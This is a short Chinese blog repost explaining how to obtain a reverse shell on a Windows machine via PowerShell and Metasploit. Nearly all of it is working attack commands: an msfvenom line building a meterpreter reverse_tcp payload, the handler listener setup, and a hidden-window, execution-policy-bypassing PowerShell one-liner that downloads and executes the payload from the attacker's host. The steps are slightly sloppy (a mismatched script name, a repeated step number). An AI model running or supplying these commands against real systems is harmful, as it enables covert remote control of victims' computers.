码迷,mamicode.com
首页 > Web开发 > 详细

利用powershell反弹shell到metasploit

时间:2017-07-04 20:09:44      阅读:2939      评论:0      收藏:0      [点我收藏+]

标签:down   exploit   web   style   windows   window   64位   shel   span   

一、使用msfvenom生成PS1文件:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.217.162 LPORT=7788 -f psh-reflection >7788.ps1

二、开启msf监听:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost xxx.xxx.xxx.xxx
lhost => xxx.xxx.xxx.xxx
msf exploit(handler) > set lport xxx
lport => xxx
msf > run

二、在目标机器执行cmd命令:

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.217.162/7788.ps1‘);xx.ps1"

注意区分目标及系统是32位还是64位。

利用powershell反弹shell到metasploit

标签:down   exploit   web   style   windows   window   64位   shel   span   

原文地址:http://www.cnblogs.com/penguinCold/p/7117956.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!